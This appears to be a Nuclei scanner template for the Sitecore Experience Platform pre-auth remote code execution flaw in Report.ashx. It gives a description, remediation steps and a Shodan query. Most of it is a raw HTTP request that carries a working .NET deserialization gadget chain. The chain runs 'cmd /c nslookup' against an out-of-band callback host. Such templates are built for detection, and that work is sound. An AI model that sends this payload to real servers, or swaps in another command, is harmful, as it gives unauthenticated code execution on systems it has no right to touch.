2021-11-03 11:22:25 +00:00
id : sitecore-pre-auth-rce
info :
name : Sitecore Experience Platform Pre-Auth RCE
author : pdteam
severity : critical
description : This issue is related to a remote code execution vulnerability through insecure deserialization in the Report.ashx file. This file was used to drive the Executive Insight Dashboard (of Silverlight report) that was deprecated in 8.0 Initial Release.
tags : rce,sitecore,deserialization,oast
reference :
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
2021-11-03 11:41:48 +00:00
remediation :
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
2021-11-03 11:57:53 +00:00
metadata :
shodan-query : http.title:"SiteCore"
2021-11-03 11:22:25 +00:00
requests :
- raw :
- |
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
<?xml version="1.0" ?>
<a>
<query></query>
<source>foo</source>
<parameters>
<parameter name="">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
xmlns:x="http://www.w3.org/2001/XMLSchema"
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Count>
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
xmlns="">
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
xmlns:a="http://schemas.datacontract.org/2004/07/System">
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
xmlns="">
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
<a:delegateEntry z:Id="7">
<a:assembly z:Ref="6" i:nil="true"/>
<a:delegateEntry i:nil="true"/>
<a:methodName z:Id="8">Compare</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</a:delegateEntry>
<a:methodName z:Id="11">Start</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</Delegate>
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="11" i:nil="true"/>
<AssemblyName z:Ref="12" i:nil="true"/>
<ClassName z:Ref="13" i:nil="true"/>
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method0>
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="8" i:nil="true"/>
<AssemblyName z:Ref="6" i:nil="true"/>
<ClassName z:Ref="9" i:nil="true"/>
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method1>
</_comparison>
</Comparer>
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Version>
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
xmlns="">
<string z:Id="25"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
<string z:Id="26"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
</Items>
</ArrayOfstring>
</parameter>
</parameters>
</a>
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms DNS Interaction
words :
- "dns"
- type : word
part : body
words :
- "System.ArgumentNullException"
